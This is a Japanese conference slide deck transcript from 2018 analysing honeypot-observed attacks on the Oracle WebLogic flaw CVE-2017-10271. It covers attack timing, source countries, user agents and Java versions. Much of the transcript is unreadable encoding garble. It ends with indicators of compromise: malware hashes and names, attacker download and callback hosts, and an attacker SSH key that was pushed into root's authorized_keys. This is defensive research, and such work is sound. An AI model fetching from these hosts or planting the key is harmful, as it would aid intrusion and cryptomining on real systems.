Upgrade to Pro — share decks privately, control downloads, hide ads and more …

WebLogic の脆弱性(CVE-2017-10271)を狙う攻撃者たちの手法

WebLogic の脆弱性(CVE-2017-10271)を狙う攻撃者たちの手法

2018年2月24日 第3回ハニーポッター技術交流会発表資料 @morihi_soc #hanipo_tech
https://hanipo-tech.connpass.com/event/78002/

Kazuaki Morihisa

February 24, 2018
Tweet

More Decks by Kazuaki Morihisa

Other Decks in Technology

Transcript

  1. XIPBNJ w ৿ٱ࿨ত !NPSJIJ@TPD  w ຊۀ͸ηΩϡϦςΟΤϯδχΞɾΞφϦετ w झຯͰϋχʔϙοτͷӡ༻Λ͢Δϋχʔϙολʔ w

    ϒϩάˠIUUQXXXNPSJIJTPDOFU w ϋχʔϙολʔٕज़ަྲྀձओ࠵ऀ w άϧʔϓˠIUUQTIBOJQPUFDIDPOOQBTTDPN  ˡϒϩάͷʮϋχʔϙοτ؍࡯ه࿥ʯ͕ ຊʹͳΓ·ͨ͠ ೥݄೔ൃച ిࢠॻ੶൛ແྉࢼಡ൛͋Γ·͢  ʮαΠόʔ߈ܸͷ଍੻Λ෼ੳ͢Δ ϋχʔϙοτ؍࡯ه࿥ʯ ஶऀɿ৿ٱ࿨ত ग़൛ɿल࿨γεςϜ ࠓ·Ͱʹ͓ੈ࿩ʹͳͬͨΠϕϯτ ɾ*5,FZT ݱ4FD$BQ  ɾωοτϫʔΫύέοτΛಡΉձ Ծ  ɾ/*4$αΠόʔϋϩ΢Οϯ ɾ*OUFSOFU8FFL ɾ)BSEFOJOH 7BMVF$IBJO༏উ  ɾTTNKQ ɾ"*4FD ɾULULηΩϡϦςΟษڧձ
  2. ͓඼ॻ͖ w 8FC-PHJDͷ੬ऑੑ $7& ͱ͸ w ࠃ͝ͱͷ߈ܸݕ஌ճ਺ͷूܭ w ߈ܸස౓ͷ෼ੳ w

    ߈ܸର৅ͷௐࠪͱ߈ܸ w Ͳͷϙʔτ͕ૂΘΕͨͷ͔  w ߈ܸऀͷ؀ڥΛਪଌ͢Δ w ߈ܸࣄྫ঺հ w ·ͱΊ 3
  3. 8FC-PHJDͷ੬ऑੑ $7& ͱ͸ w +7/J1FEJBΑΓ l0SBDMF'VTJPO.JEEMFXBSFͷ0SBDMF8FC-PHJD 4FSWFSʹ͸ɺ8-44FDVSJUZʹؔ͢Δॲཧʹෆඋ͕͋ ΔͨΊɺػີੑɺ׬શੑɺ͓ΑͼՄ༻ੑʹӨڹͷ͋Δ੬ ऑੑ͕ଘࡏ͠·͢ɻl lϦϞʔτͷ߈ܸऀʹΑΓɺ৘ใΛऔಘ͞ΕΔɺ৘ใΛվ

    ͟Μ͞ΕΔɺ͓ΑͼαʔϏεӡ༻๦֐ %P4 ߈ܸ͕ߦΘ ΕΔՄೳੑ͕͋Γ·͢ɻl 4 JVNDB-2017-008734 Oracle Fusion Middleware ͷ Oracle WebLogic Server ʹ͓͚Δ WLS Security ʹؔ͢Δ੬ऑੑ http://jvndb.jvn.jp/ja/contents/2017/JVNDB-2017-008734.html →ϦϞʔτ͔Β೚ҙͷίʔυΛ࣮ߦ(RCE)Մೳͳ ެ։͞Εͨ߈ܸπʔϧ͕ެ։͞Εͨ
  4. λΠϜϥΠϯ w ೥݄ɿ0SBDMF͔Βमਖ਼ϓϩάϥϜ͕ެ։ w ೥݄Լ०ɿ߈ܸίʔυ͕ެ։ w ೥݄೔ɿϋχʔϙοτͰ߈ܸΛݕ஌ w ೥݄೔ɿϒϩάهࣄެ։ w

    ೥݄೔࣌఺ɿ߈ܸܧଓதʜ 6 ϋχʔϙοτ؍࡯ه࿥(38)ʮWebLogic ͷ WLS Security ʹର͢ΔίϚϯυ࣮ߦͷࢼΈ(CVE-2017-10271)ʯ http://www.morihi-soc.net/?p=910
  5. ϋχʔϙολʔͷ೰Έ ϩάެ։ج४ w ͳ݄ͥ೔࣌఺Ͱ͸πΠʔτͷΈ 7 w ໌֬ʹ߈ܸίʔυ͕ެ։͞Ε͍ͯΔͱ͍͏৘ใ͕ ಘΒΕͳ͔ͬͨɻϩάΛެ։͢Δ͜ͱͰɺ໛฿͠ ͨ߈ܸʹΑΔೋ࣍ඃ֐ͷ๷ࢭΛ༏ઌɻ w

    ߈ܸΛݕ஌͍ͯ͠Δࣄ࣮͸఻͔͑ͨͬͨɻ w ͦͷޙɺ(JU)VC౳Ͱ߈ܸπʔϧ͕ެ։͞Ε͍ͯΔ ͜ͱΛ֬ೝɻϒϩάެ։ʹࢸΔɻ w ߈ܸϩάΛެ։͢Δ͜ͱͰɺύονద༻ͷۓٸੑɺ ͓Αͼ߈ܸੑͷߴ͞Λ఻͔͑ͨͬͨɻ
  6. ηΩϡϦςΟͷ৘ใڞ༗͸೉͍͠ w ηΩϡϦςΟͷ৘ใڞ༗ͱ͍͑͹ɺ*1"΍+1$&35 $$ɺηΩϡϦςΟϕϯμʔΛ͸͡ΊɺॏཁΠϯϑϥ Ͱ͋Ε͹/*4$ͷηϓλʔɺ*1"ͷαΠόʔ৘ใڞ ༗ΠχγΞςΟϒ +$4*1 ͳͲɺଟ਺ଘࡏ͢Δɻ w ͨͩ͠߈ܸͷ࣮ମ͕Ұൠެ։͞ΕΔ͜ͱ͸كɻ

    w ߈ܸऀ͸Ξϯμʔάϥ΢ϯυͳͱ͜ΖͰɺ߈ܸ৘ใ Λڞ༗͍ͯ͠Δʹ΋ؔΘΒͣɺηΩϡϦςΟʹܞΘ Δਓͨͪͷ৘ใڞ༗ʹ͸λΠϜϥά͕͋Δɻ 8 ˠϋχʔϙοτͩͱ৘ใެ։͠΍͍͢ͷͰɺ
 ݸਓతͳ׆ಈͱͯ͠ϒϩάΛॻ͍͍ͯ·͢ɻ
  7. ࢀߟ ੬ऑੑ৘ใ͓͍ͬͯ͘Β w ࠓճͷ੬ऑੑ৘ใ ߈ܸίʔυ ͷ஋ஈ͸ɾɾɾ 9 Oracle WebLogic Server

    10.3.6.0.0/12.1.3.0.0/12.2.1.1.0/12.2.1.2.0 WLS Security unknown vulnerability https://vuldb.com/?id.108063 →0day ͷؒ͸ɺ໿1100ສԁ-5300ສԁͩͬͨ
  8. ࠃ͝ͱͷ߈ܸݕ஌ճ਺ͷूܭ w ੈք֤஍͔Β߈ܸͷϩά͕࢒͍ͬͯͨɻ 10 352 தࠃ 331 ΞΠϧϥϯυ 324 ΞϝϦΧ߹ऺࠃ

    168 ηΠγΣϧ 100 Χβϑελϯڞ࿨ࠃ 89 ೔ຊ 53 Χφμ 47 ߳ߓ 46 ΢ΫϥΠφڞ࿨ࠃ 44 υΠπ࿈๜ڞ࿨ࠃ 24 ϋϯΨϦʔڞ࿨ࠃ 20 γϯΨϙʔϧ 12 ίϩϯϏΞڞ࿨ࠃ 11 ΢ϧάΞΠڞ࿨ࠃ 3 େؖຽࠃ 3 ϒϧΨϦΞڞ࿨ࠃ 2 ϧʔϚχΞ 2 ΦϥϯμԦࠃ 1 ϩγΞ 1 ε΢ΣʔσϯԦࠃ ࢖༻ͨ͠ GeoIP σʔλϕʔε(GeoLite2 Country: 2018೥2݄ʹμ΢ϯϩʔυͨ͠ϑΝΠϧΛར༻) https://dev.maxmind.com/ja/geolite2/
  9. 0 20 40 60 80 100 120 140 160 180

    2017/12/24 2017/12/25 2017/12/26 2017/12/27 2017/12/28 2017/12/29 2017/12/30 2017/12/31 2018/1/1 2018/1/2 2018/1/3 2018/1/4 2018/1/5 2018/1/6 2018/1/7 2018/1/8 2018/1/9 2018/1/10 2018/1/11 2018/1/12 2018/1/13 2018/1/14 2018/1/15 2018/1/16 2018/1/17 2018/1/18 2018/1/19 2018/1/20 2018/1/21 2018/1/22 2018/1/23 2018/1/24 2018/1/25 2018/1/26 2018/1/27 2018/1/28 2018/1/29 2018/1/30 2018/1/31 2018/2/1 2018/2/2 2018/2/3 2018/2/4 2018/2/5 2018/2/6 2018/2/7 2018/2/8 2018/2/9 2018/2/10 2018/2/11 2018/2/12 2018/2/13 2018/2/14 2018/2/15 2018/2/16 2018/2/17 WebLogic (2017 12 24 -2018 2 17 ) ߈ܸස౓Λ෼ੳ w ϋχʔϙοτͰݕ஌ͨ͠߈ܸΛ೔͝ͱʹूܭ w 8FC-PHJDͷௐࠪͱ߈ܸͷ྆ํΛؚΉ 11 156݅ͷ߈ܸ/೔͕࠷ଟ શମͰ1,633݅
  10. ߈ܸର৅ͷௐࠪͱ߈ܸ w ϦΫΤετຖʹूܭ w ਪଌ w (&5ϝιου͸ɺίϯςϯπ಺༰Λௐࠪ w )&"%ϝιου͸ɺ4FSWFSϔομΛௐࠪ w

    1045ϝιου͸ɺର৅ͷ؀ڥʹؔ܎ͳ͘߈ܸ 13 ϝιουͷछྨ ߈ܸݕ஌݅਺ (&5  )&"%  1045 
  11. Ͳͷϙʔτ͕ૂΘΕͨͷ͔  w ߈ܸऀ͸ɺ߈ܸର৅ͷ؀ڥΛඞͣ͠΋ߟྀ͍ͯ͠ͳ ͍ɻແࠩผʹ߈ܸ͍ͯ͠ΔՄೳੑ͕ߴ͍ɻ w 8FC-PHJDͷ؅ཧ༻ϙʔτͱͦΕҎ֎ͷϙʔτ΋
 ߈ܸ͕͖͍ͯͨͷ͔ 14 Oracle®

    Fusion Middleware Oracle Fusion Middlewareͷ؅ཧ 12c (12.1.2) https://docs.oracle.com/cd/E50629_01/core/ASADM/portnums.htm#CHDIACEF ※WebLogic ͷ؅ཧ༻ϙʔτͷ෦෼ʹ੺Լઢ
  12. ߈ܸऀͷ؀ڥΛਪଌ͢Δ w ߈ܸϦΫΤετͷ6TFS"HFOUΛूܭͯ͠Έͨɻ w ໌Β͔ʹෆ৹ͳ΋ͷͱɺ௨ৗൃੜ͠͏Δ΋ͷ͕ࠞࡏɻ 16 6TFS"HFOU ݅਺ .P[JMMB 8JOEPXT/5

    "QQMF8FC,JU ,)5.- MJLF(FDLP $ISPNF4BGBSJ  .P[JMMB 8JOEPXT/58JOYSW (FDLP'JSFGPY  .FNFT  .P[JMMB  QZUIPOSFRVFTUT  .P[JMMB .BDJOUPTI*OUFM.BD049@@ "QQMF8FC,JU ,)5.- MJLF(FDLP $ISPNF4BGBSJ  QZUIPOSFRVFTUT  .P[JMMB 8JOEPXT/5808 "QQMF8FC,JU ,)5.- MJLF(FDLP $ISPNF4BGBSJ$PSF 22#SPXTFS  .P[JMMB DPNQBUJCMF#BJEVTQJEFS IUUQXXXCBJEVDPNTFBSDITQJEFSIUNM  .P[JMMB 8JOEPXT/5SW (FDLP'JSFGPY  .P[JMMB 8JOEPXT/5 "QQMF8FC,JU ,)5.- MJLF(FDLP $ISPNF4BGBSJ  .P[JMMB DPNQBUJCMF.4*&8JOEPXT/58085SJEFOU  .P[JMMB 8JOEPXT/5808SW (FDLP'JSFGPY  ͦͷଞ  → → → →
  13. ߈ܸऀͷ؀ڥΛਪଌ͢Δ w ͪΐͬͱݹ͍͕ɺ+%,ܥͷόʔδϣϯ͕ଟ͍ɻ w ߈ܸπʔϧʹϋʔυίʔυ͞Ε͍ͯΔՄೳੑ΋͋Γɻ 18 +BWBόʔδϣϯ ݅਺ @ 

    @      @    Java™ SE Development Kit 8, Update 151 (JDK 8u151) October 17, 2017 http://www.oracle.com/technetwork/java/javase/8u151-relnotes-3850493.html ←2017೥10݄ʹެ։ ͞Εͨόʔδϣϯ w 8FC-PHJDͷ੬ऑੑ৘ใ͸೥݄ʹެ։͞Ε
 ͍ͯͯɺπʔϧ͕࡞੒͞Εͨ࣌ظͱҰக͢Δɻ
  14. ߈ܸϦΫΤετ w ߈ܸϦΫΤετͷ௥ܸ w DTDSJQUίϚϯυͰɺμ΢ϯϩʔυͨ͠εΫϦϓτ ϑΝΠϧΛ࣮ߦ͢Δ͚ͩɻ w ߈ܸϦΫΤετ͸ඇৗʹ௝͍͠૊Έ߹Θͤɻ 41 (certutil

    ࢀߟ)๷Ӵؔ࿈ͷϑΝΠϧΛ૷͏ϚΫϩϚϧ΢ΣΞͷ৽͍͠खޱ
 (ϚΫχΧωοτϫʔΫε ηΩϡϦςΟݚڀηϯλʔϒϩά) http://blog.macnica.net/blog/2017/12/post-8c22.html
  15. ·ͱΊ w 0SBDMF8FC-PHJDͷ੬ऑੑ $7& ʹ ͍ͭͯ঺հ͠·ͨ͠ɻ w ೥݄຤͔Β೥݄·ͰͷϩάΛ෼ੳ͠ ͨ݁Ռɺແࠩผʹ߈ܸ͍ͯ͠Δͱߟ͑ΒΕΔ௨৴͕ େଟ਺Ͱͨ͠ɻ

    w ੬ऑੑ৘ใͱ߈ܸπʔϧͷ࡞੒࣌ظΛਪଌ͢Δͱɺ ೥݄຤ΑΓલʹ߈ܸ͞Ε͍ͯͨՄೳੑ༗ɻ w ੬ऑͳ؀ڥͩͬͨ৔߹ɺ$16Ϧιʔε΍ωοτϫʔ ΫϦιʔεͷෆਖ਼࢖༻͚ͩͰͳ͘ɺෆਖ਼ϩάΠϯͳ Ͳ༷ʑͳӨڹΛड͚ΔՄೳੑ͕ߴ͍ɻ w ࠓճ঺հͨ͠߈ܸϩά͸શମͷׂʹ΋ຬͨͳ͍ɻ 45
  16. *P$ 01ebeaf06f5a2fcbf14025a8e683293d cat.php 036b34853622f38c285babf1a8670b62 svchosx.exe 0a6f3934f53966e2bdd4721ba512bd1c weblogic.hta 0b156ec492ea45d282cf823415ecaf12 IPsecSrv.dll 0d91bd78bfb6eab168ebb697bd5d31a4

    transfer-etn.sh 26198be2276b9d7a4cbf4dad4155995d kworker.sh 2874b491c166d3b3949b2f94182e1759 svvchost.exe 38535ff9e16902305e3d938a5f429879 mssql.exe 3acdb039179e120da05aa2c53542f944 paSmuRYy 3af4c8196fbb3ae1744291bfdeaa6f98 pool.zip 3fb41234895102be5c439132f85c0ef9 payload.py 5aeb79a353888fd552dc7cc129e696a6 dada.x86_64 5c53d65c44e5e7c05c743811487eecdb x32.exe 5ff51056a25c8b9a20842ea9d05c0495 minerd 8327245a8feb3290de39df5ceefd58bf start_xmr.ps1 8c8a30372e4fdba50cb2e6ffdb5af883 mssql.exe 929c9eeff262e198fd29f8c75edfc5fd xrun.exe 9ad4bd564978c1b5a8540b6b6f021bdb x64.exe 9cde0af2caa9fab7cb042487dfd9ab08 eblue.exe 9f0d6dce1e043858f3d239b101d0b19d 7001.exe a2ac17c2bb6148b7e22c610964e398d2 rZhqDVLP a2ce07681d158a13557928457c950ebe ex32.exe a4f2b45c832257b5fd662b9eee2f82f1 linuxsyn b29e0910573f96d8447801814dd2b73e xrun-etn.exe b6657f348f5915ae6052e5f9c56343e8 loveby.exe b8a107d8b0f1e582c86a6def628ab1f3 jiba bf4ba4b0450a5a436a9ec9dc4b504d72 kefarbo.exe c357a4ad84dd7c3d4de5f7ab3942a121 minerxmr.exe c97b69f1bbf36ca94aaa664ea78e16dc pri.sh d5aa5b2a023893460b9ef2584d0fa7a8 niao.exe dbdac5198ffde5c15710176cbd79095c transfer.sh df980ebae2a9a83409a3ccd03a5e3603 cross.exe f50298bbe7226587bd641410849174df cloud fdac6a6d0c98e45c3b93d478cd4d0042 18r4m 46 ෆ৹ͳϑΝΠϧͷϋογϡ஋ɾϑΝΠϧ໊ 107.181.174.248 111.67.198.104 111.67.198.246 112.30.132.138:2323 120.132.17.180:66 123.249.24.175:8088 132.148.150.15:8080 133.242.163.81:4444 137.59.18.173 18.217.195.175:132 182.18.8.69:8088 185.216.117.85:11152 185.227.152.132:2124 190.60.206.11 190.60.206.11:8443 199.188.104.73:32135 199.188.104.75:32135 204.152.209.251:2114 204.152.209.251:21145 204.152.209.251:221 205.209.177.18 221.9.251.236 222.184.79.11:5317 222.184.79.11:5318 222.184.79.11:5319 222.184.79.11:5320 222.184.79.11:5329 222.186.150.175:8080 222.186.150.175:81 223.68.209.7:65510 27.148.157.89:8899 35.189.171.208:55555 43.226.35.42:2323 46.4.26.204 58.218.201.20:8088 67.218.135.178 80.82.70.234:6969 97.64.19.115 bbc.servehalflife.com cnhv.co get.fu2k.net:66 ipfs.fu2k.net qwer.world usa.neozju.com www.kangnajiang.top:132 ϑΝΠϧμ΢ϯϩʔυݩɾcallback ͷ௨৴ઌ ※ίϩϯ(:)Ҏ߱͸ϙʔτ൪߸
  17. *P$ w ߈ܸऀͷ44)ͷެ։ݤ ˞SPPUϢʔβͷTTIBVUIPSJ[FE@LFZTϑΝΠϧ΁௥ه ΛࢼΈ͍ͯ·ͨ͠ɻ w 1BTUFCJOͷϑΝΠϧ IUUQˠI99Q IUUQTˠI99QT 

    w I99QQBTUFCJODPNSBXS;IR%7-1 w I99QTQBTUFCJODPNSBXQB4NV3:Z 47 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu 8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqze Irk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHB ssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26